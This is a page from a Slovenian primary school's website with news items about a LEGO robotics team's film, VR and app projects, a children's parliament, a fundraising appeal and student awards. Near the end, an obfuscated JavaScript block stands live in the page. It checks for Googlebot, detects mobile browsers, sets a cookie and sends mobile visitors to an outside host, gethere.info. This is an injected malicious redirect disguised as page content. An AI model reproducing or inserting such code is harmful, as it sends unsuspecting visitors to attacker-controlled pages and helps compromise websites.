Skoči na glavno vsebino

logo-EkosolaA� A�zdravasA� A�etwinA� A�EU_flag_23LA� A�spitalic1A� A�park1A� A�eplus

OA� Pod goro

A�olska ulica 3
3210 Slovenske Konjice
03 757 29 50

PodruA?nica V parku
03 757 29 75

PodruA?nicaA�OA� A�pitaliA?
03 5763 133

Razvoj rešitev v sezoni MASTERPIECE

1.1       IZDELAVA FILMA

Za izdelavo filma smo pridobili veliko znanja od strokovnjakov, s katerimi smo sodelovali. Izkoristili smo tudi naše znanje, saj smo člani vedeli montirati filme

Za pomoč smo prosili Mladinski center, ki v okviru projekta pripravlja filmske tečaje. Tudi za njih je bil to velik izziv.

1.1.1       Informativni sestanek

Najprej smo se dobili na informativnem sestanku, kjer smo pregledali osnove filma. Miha Slapnik nam je podal nekaj nalog do naslednjega srečanja. Dogovorili se smo, da bomo naredili 3 minutni film z zvočnimi in vizualnimi efekti. Najprej smo naredili idejni načrt. Vsak je napisal vse kar se spomni, ko pomisli na temo gasilstvo.

Pripravili smo vprašanja za anketo, katero smo pozneje ustvarili in poslali.

Naš cilj je, da navdušimo in izobrazimo poslušalce. Pomembno je, da ima svaka stvar svoj razlog.

Razmisliti smo morali, kako bi povedali zgodbo, katere lokacije bi uporabili, kakšen žanr bi uporabili ipd.

1.1.2       Drugo srečanje

Pregledali smo odgovore ankete in upoštevali mnenja udeležencev. Začeli smo pripravljati zgodbo. Vsak je podal svoje mnenje in svojo zgodbo, kako bi gasilstvo predstavili.

1.1.3       Tretje srečanje

Upoštevali smo zgodbe in začeli z pisanje scenarija. Pri tem nam je pomagal Miha, ki je strokovnjak na tem področju. Predstavil nam je osnove snemanja, pregledali smo tehnično opremo in začeli pisati scenarij.

1.1.4       Četrto srečanje

Na tem srečanju smo pripravili listo kadrov, ki ga lahko podrobneje vidite v prilogi. Za vsak prizor smo napisali:

  • Lokacijo, kje bomo prizor snemali
  • Like, ki bodo nastopali
  • Rekvizite, ki jih bomo potrebovali
  • Kamere, ki jih bomo potrebovali
  • Mikrofone
  • Luči
  • Dodatno opremo

Ko smo to zapisali, smo imeli vse pripravljeno za snemanje.

1.1.5       Snemanje 1. del

Pri dan snemanja smo posneli prizore v parku in v dnevni sobi. Ob snemanju smo se zelo zabavali, čeprav je bilo zelo mrzlo. Snemanje je potekalo brez večjih težav. Prizore smo snemali vsakega najmanj trikrat, včasih katere tudi desetkrat.

Od gasilcev smo si posodili profesionalno opremo, vse ostalo pa smo si priskrbeli sami. Snemalno opremo smo imeli od Mladinskega centra. Strokovnjaki iz MC so bili ves čas snemanja z nami in nam pomagali.

Nekatere prizore smo snemali z dronom.

1.1.6       Snemanje 2. del

Drugi dan smo snemali prizore v gasilskem domu. Z nami je bil tudi pravi gasilec, ki nam je pomagala pri snemanju, vozil gasilsko vozilo in uporabljal vso gasilsko opremo, ki smo jo potrebovali.

Ko smo imeli vse prizore posnete, smo naredili 3 varnostne kopije posnetkov. Na zunanji disk smo prenesli vse posnetke, katere smo uporabili pri montaži.

Določene kadre smo posneli tudi s 360° kamero.

1.1.7       Snemanje 3. del

Intervju smo snemali tretji dan. Intervju je potekal v gasilskem muzeju. Pri snemanju so nam pomagali strokovnjaki iz MC.

1.1.8       Montaža

Montažo smo delali v multimedijski sobi na šoli. Šola ima licenco za program Pinnacle Studio. Najprej smo si vse videoposnetke prenesli na računalnik, potem smo jih razvrstili po vrsti datoteke. Nato smo jih razvrstili po kategorijah, da smo se lažje lotili montaže. Pri montaži vizualnih efektov nam je pomagal strokovnjak. Tudi vizualne učinke so nam pomagali iz MC. Dodali smo še zvok za ozadnje in uredili prehode.

1.2       IZDELAVA VIRTUALNEGA SVETA V MINECRAFT

Gašper in Filip sta ustvarila Minecraft svet, kjer sta ustvarila poligon za gasilce. Najprej smo svet naredili v Minecraft Education verziji. Nato smo ugotovili, da s to verzijo ne moremo uporabljati VR očala Oculus Quest 2. Zato se je Gašper lotil ustvarjanja sveta v aplikaciji MineCraft Bedrock. Nato smo računalnik povezali na aplikacijo, prenesli svet in igrali s pomočjo kontrolorjev in očal.

1.3       IZDELAVA INTERAKTIVNE VIRTUALNE VSEBINE – GASILEC V AKCIJI

Med snemanjem filma smo nekatere zanimive kadre posneli tudi s 360° kamero. Potem smo te posnetke pretvorili v 360° posnetke in jih prenesli v aplikacijo Thinglink. Šola ima kupljeno licenco za ta program, uporabo pa nam je pokazal učitelj računalništva. Za prvo sliko smo uporabili sliko okolice gasilkega doma. Potem pa smo naredili interaktivne gumbe, preko kateri uporabnik pride do VR posnetkov gasilca, ki je v akciji. Ko si uporabnik pogleda posnetek, se vrne na prvo sliko in izbere druge posnetke. Nekatere360° posnetke smo morali urediti. To smo naredili v programu Pinnacle, s katerim smo montirali film. Program Pinnacle namreč omogoča urejanje 360° filmov. Predstavitev smo delili javnosti in si jo lahko pogleda vsak, ki ima pametni telefon z vgrajenim gyro senzorjem in navadna VR očala.

1.4       Igra Gasilec v UNITY + VR očala OCULUS QUEST 2

S pomočjo strokovnjak Jerneja Kamenšeka, ki je zaposlen na Gimnaziji SK smo ustvarili virtualno igro na temo gasilstva. To igro bomo razvijali naprej. Igro smo naložili na VR očala in jo lahko igramo s pomočjo kontrolerjev.

1.5       APLIKACIJA iGASILEC

Razvili smo aplikacijo za mobilne telefone, ki smo jo poimenovali iGasilec. Uporabniku aplikacija omogoča hitro reakcijo ob različnih nezgodah. Uporabnik lahko v aplikaciji dostopa do hitrega klica nujne pomoči. V aplikaciji uporabnik najde korake, kaj lahko naredi do prihoda nujne pomoči. Aplikacija je enostavna za uporabo in nudi najnujnejše korake za pomoč.

1.6       VIRTUALNI SPREHODI PO GASILSKIH DOMOVIH IN MUZEJIH

S pomočjo 360° kamere in programa Thinglink smo naredili sprehode po lokalnih gasilskih domovih. Naredili smo več 360° slik po gasilskem domu. Potem smo slike uvozili v program Thinglink, ki omogoča urejanje in ustvarjanje virtualnih sprehodov. Uporabnik si sprehod naloži na telefon, potem telefon vstavi v VR očala in se sprehaja po gasilskem domu.

Obiskovali smo strokovnjake

ISKANJE STROKOVNJAKOV IZ TEGA PODROČJA

Po odločitvi smo poiskali veliko strokovnjakov, ki so nam pomagali pri razvoju projekta.

Fakulteta za računalništvo in informatiko v Mariboru

Ogledali smo si RTV studio Medijskih komunikacij in spoznali vloge in način dela v medijski produkciji, nato pa na delavnici montaže izdelali kratek video z uporabo namenske programske opreme. Obisk smo nadaljevali na Inštitutu za močnostno elektrotehniko. Ogledali smo si delovanje elektroenergetskega sistema Slovenije ter novega laboratorija za pametna omrežja.

Radio Rogla

Obiskali smo Radio Rogla – kjer smo spoznali urejanje zvočnih učinkov in delovanje radia. Spozanli smo različne poklice na radiu. Spoznali smo uporabo gimbala za snemanje videev z telefonom. Pokazali so nam, kako pomembno je sodelovanje radia na socialnih omrežjih in kako s tem upravljajo.

Koncert 20. letnica Gimnazije

Na 20 obletnici gimnazije smo si ogledali tehnologijo, ki jo uporabljajo na koncertih. Mešalne mize, upravljanje zvoka, projekcije, luči. Uporaba učinkov. Namestitev strojne opreme. Ogledali smo si delo tonskega mojstra in vodja predstave.

Gimnazija Slovenske Konjice

Obiskali smo Gimnazijo SK, kjer nam je strokovnjak Jernej Kamenšek pokazal VR tehnologijo in nam pripravil delavnico v ustvarjanju virtualnega sveta. Posodili so nam VR očala.

Festival novomedijske kulture SPECULUM ARTIUM

Obiskali smo festival novomedijske kulture SPECULUM ARTIUM v Trbovlju, kjer so nam strokovnjaki pokazali povezovanje umetnosti z tehnologijo.

Tehnološki park Celje

Ogledali smo si Tehnološki park v Celju. Strokovnjaki so nam pokazali uporabo VR tehnologije in druge zanimive tehnologije. Pripravili so nam robotsko delavnico.

Srednješolski center Zreče

Na Srednješolskem centru v Zrečah smo imeli VR delavnico, kjer smo varili v virtualnem svetu.

Kulturni dom Slovenske Konjice

Obiskali smo Kulturni dom Slovenske Konjice, kjer si si ogledali delo tehničnega osebja za upravljanje projekcij, vizualnih in zvočnih učinkov.

Razstava sodobne tehnologije v Ljubljani

V Ljubljani smo si ogledali razstavo sodobne tehnologije v Cankarjevem domu. Spoznali smo različne robote, virtualno in obogateno resnično.

Ogled muzeja zgodovine Castila-La Mancha

Ogledali smo si virtualni sprehod po muzeju zgodovine v Španiji.

Mladinski center Dravinjske doline

Obiskali smo Mladinski center Dravinjske doline, kjer smo si ogledali opremo. Predstavili so nam delo in nam pomagali pri snemanju filma. Sodelovali smo s strokovnjaki Miha Slapnik, Klara in Mija.

Učitelj računalništva

Učitelj računalništva nam je pokazal ustvarjanje interaktivnih VR vsebin v programu Thinglink.

Medobčinski Otroški parlament

»Menimo, da so stiske mladostnikov najpogosteje povezane s pritiski s strani staršev in šole, včasih pa jih povzročajo tudi vrstniki in družbena omrežja. Večina mladostnikov in mladostnic strategij za samopomoč ne pozna dovolj dobro, zato bi se morali v šoli o njih več pogovarjati. Tisti, ki so seznanjeni s strategijami za samopomoč, pa jih tudi ne uporabljajo pogosto. Še največkrat je uporabljena strategija pogovor, včasih pa tudi gibanje, stik z živalmi in tu in tam dihalne vaje.« (Sklep medobčinskega Otroškega parlamenta, 22. marec 2024)

Že drugo leto zapored je tema Otroškega parlamenta Duševno zdravje otrok in mladih. Medobčinski Otroški parlament v konjiškem dvorcu Trebnik je na 100. obletnico rojstva pesnika Ivana Minattija, organizirala naša šola, sodelovale pa so še OŠ Ob Dravinji, OŠ Loče, OŠ Vitanje in OŠ Zreče. Kulturni program so pripravile učenke konjiške in zreške šole. Mlade parlamentarke in parlamentarce je nagovorila predsednica domačega Društva prijateljev mladine Janja Brglez, ki je mlade pozvala k iskanju različnih načinov samopomoči in jim predstavila tudi nekaj oblik pomoči, ki jih nudi Zveza prijateljev mladine Slovenije.

Učenci in učenke so se razporedili v pet skupin, kjer so s pomočjo priročnika za mladostnice in mladostnike Kaj lahko naredim, da mi bo lažje in ob pomoči mentoric Andreje Blimen Majcen in Urške Marguč razpravljali o miselnih pasteh, v katere se pogosto ujamejo mladi. Spoznavali in razpravljali so o strategijah za samopomoč kot so prijazen odnos do sebe, pogovor, tehnike sproščanja, postopno soočanje s situacijo, redno gibanje, urejeno spanje, čuječnost in psihična odpornost.

V drugem delu delavnice so iskali primere situacij iz njihovega življenja, ki jim povzročajo stres in vplivajo na njihovo duševno zdravje. Razpravljali so o tem, kako takšne situacije vplivajo na njihove misli, čustva, telesne znake in vedenje. Iskali so najprimernejše strategije za reševanje opisanih situacij. Na koncu delavnice so učenci in učenke oblikovali sklep njihovih spoznanj in razprav. Delavnica je potekala v prijetnem vzdušju, s konstruktivnimi debatami in tudi smehom. Kljub temu, da se učenci in učenke med sabo niso poznali, so bili pripravljeni drug z drugim podeliti lastne izkušnje in lastna videnja na to temo.

Učenci in učenke so v skupinah svoja spoznanja in sklepe predstavili ostalim učenkam in učencem, mentoricam, ravnateljicam, predstavnicam in predstavnikom občin ter članicam Društva prijateljev mladine Slovenske Konjice.

Pet učenk in učencev se je udeležilo regijskega Otroškega parlamenta, ki je bil v torek, 26. marca, v Celju. To so: Eva Koprivnik iz OŠ Zreče, Ema Gumzej iz OŠ Loče, Pia Zlodej iz OŠ Vitanje, Ajda Druškovič iz OŠ Pod goro in iz OŠ Ob Dravinji Lucijan Lovrenčič.

Foto: Anže Petek

Z nami je brala tudi predsednica države

Na 100. rojstni dan velikega pesnika, urednika in prevajalca Ivana Minattija se je starostnikom in učencem na branju Minattijeve poezije v Lambrechtovem domu pridružila tudi gospa predsednica države Nataša Pirc Musar.

V lepem, sproščenem vzdušju, prežetem s ponosom ob visokem obisku, tako pri mladih kot pri starejših, smo glasno brali in recitirali pesmi, peli, se spominjali preteklosti in prisluhnili modrostim predsednice in stanovalk. Z nami je brala celo stoletnica. Tudi zapeli smo.

Učence je predsednica presenetila s svojo dostopnostjo in preprostostjo, zapomnili si bodo njeno razlago enakosti in enakopravnosti, navdušenosti nad njihovo izbiro poklicev in da ji je Tone Pavček zelo ljub pesnik.

Na šoli dobrih 6 let sodelujemo v Medgeneracijskem bralnem projektu, ki poteka pod okriljem Društva Bralna značka Slovenije.

Brali smo že z učitelji, starši, gimnazijci, prostovoljkami Društva prijateljev mladine, pred slabima dvema letoma pa smo začeli brati s stanovalci Lambrechtovega doma. Tam smo tudi že trikrat prespali.

Foto: Anže Petek

FLL ekipa zbira sredstva za potovanje v Ameriko

Dober rezultat na tekmovanju First Lego liga je ekipi učencev konjiške Osnovne šole Pod goro omogočil nastop na aprilskem svetovnem prvenstvu v Ameriki. Pot jim lahko omogočimo s kakšnim prostovoljnim prispevkom.

Na OŠ Pod goro sedmo sezono sodelujejo v programu FLL. Plod dela vseh let je uvrstitev na svetovno prvenstvo v ZDA, kjer bo nastopilo 161 ekip iz celega sveta. Prvenstvo bo že čez slab mesec. Udeležba na prvenstvu za ekipo pomeni velik finančni zalogaj. Celoten strošek je ocenjen na približno 15.000 evrov, ki jih morajo zagotoviti sami, zato je vsakršna finančna pomoč zelo dobrodošla.


Podatki za nakazilo:
SKLIC: SI00 760-141 Donacija robotika (FLL)
TRR OŠ POD GORO za nakazilo: SI56 01314-6030680822

Več informacij lahko najdete v priloženem dokumentu: PROŠNJA ZA DONATORSTVO

Petošolec vrstnikom predaval o rastlinah

Petošolec Lenart Kropec je velik ljubitelj in poznavalec različnih drevesnih vrst. V sklopu učnih vsebin je tako četrtošolcem predstavil kraljestvo rastlin.

Učenci so na drugačen način prisluhnili mnogim zanimivostim, ki jih je podal Lenart. Z zanimanjem so si ogledali vejice in različne vrste lesa. Pri tem so se zelo zabavali ter izvedeli veliko novega, zato z veseljem pričakujejo ponovno druženje v naravi. 

FLL-jevci potujejo v Ameriko na svetovno prvenstvo!!!

V soboto se je s finalom Odprtega državnega prvenstva regije Adria končala sezona imenovana MASTERPIECE (MOJSTROVINA). Ekipa OŠ Pod goro, ki nastopa pod imenom MOUNTSTORMS, je dosegla izjemne rezultate.

Ekipa se je več kot odlično odrezala na vseh področij in dosegla 3. mesto v Sloveniji v generalni uvrstitvi in pokal za 2. nagrado v kategoriji vrednote v regiji Adria!

Seštevek vseh kategorij jim je prinesel skupno odlično 3. mesto v Sloveniji in skupno 4. mesto v regiji Adria.

Pozor! Ekipa se je s tem dosežkom uvrstila na svetovno prvenstvo, ki bo 17. – 20. aprila v Ameriki v Houstonu!

Organizator in izvajalec programa in dogodkov FIRST LEGO Liga v Sloveniji je organizacija Super Glavce.

Člani ekipe so: Vili Ogradi, Filip Brglez, Nino Capello, Anže Petek, Gašper Krančan in Jaša Gošnik pod vodstvom mentorja Dominika Trstenjaka.

Več o tekmovanju si lahko pogledate na povezavi: http://www.fll.si/odprto-drzavno-prvenstvo-first-lego-liga-2023-24-finale-regije-adria

ARTI/TEK/TURNI poligon

ARTI/TEK/TURNI poligon je namenjen osnovnošolcem, da spoznajo arhitekturo in oblikovanje.

Tokrat so učenke in učenci izbirnega predmeta Likovno snovanje 3 na delavnicah spoznavali osnove arhitekturnega komponiranja objektov.

Znanje so pridobivali skozi maketiranje majhne hiše in na njeni osnovi narisanega idejnega arhitekturnega načrta. Vsak par je sestavil svojo hišo, si zamislil oblikovanje fasade in okolice z zelenjem in drevesi … S hišami in drugimi elementi so sestavili skupni zaselek, ki so ga lahko poljubno spreminjali, saj so bile hiše in drugi objekti zasnovani modularno.

V avli šole je arhitekt ob pomoči učencev na tla z lepilnim trakom označil velikost hiše v merilu 1:1, da so si učenci lahko predstavljali njeno velikost in možnost bivanja v njej. Učenci so se vživeli v vloge stanovalcev in ugotavljali, koliko prostora bi potrebovali za bivanje v takšni hiški. Na koncu so hišo še narisali.

Delavnica in vse aktivnosti podpirajo projekt za razvoj in popularizacijo mladinske arhitekturne ustvarjalnosti, ki ga vodi arhitekt Erik Vodenik.

Srebro za glasbenico Ajdo

Po tem ko je lani na Slovenski glasbeni olimpijadi osvojila bronasto priznanje, se je osmošolki Ajdi Lešnik tudi letos uspelo uvrstiti na 13. Slovensko glasbeno olimpijado.

9. marca so se na Akademiji za glasbo v Ljubljani tako zbrali in povezali glasbeno nadarjeni osnovnošolci na tekmovanju, ki jim omogoča predstavitev lastne glasbene ustvarjalnosti, pevskih veščin, muzikalnosti in glasbeno-teoretičnih znanj. Tekmovanje je sestavljeno iz treh delov: pisni test, izvedba vokalne skladbe in izvedba lastne avtorske skladbe.

Na najvišjem državnem glasbenem tekmovanju za osnovnošolce je Ajda Lešnik osvojila odlično srebrno priznanje.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Dostopnost
//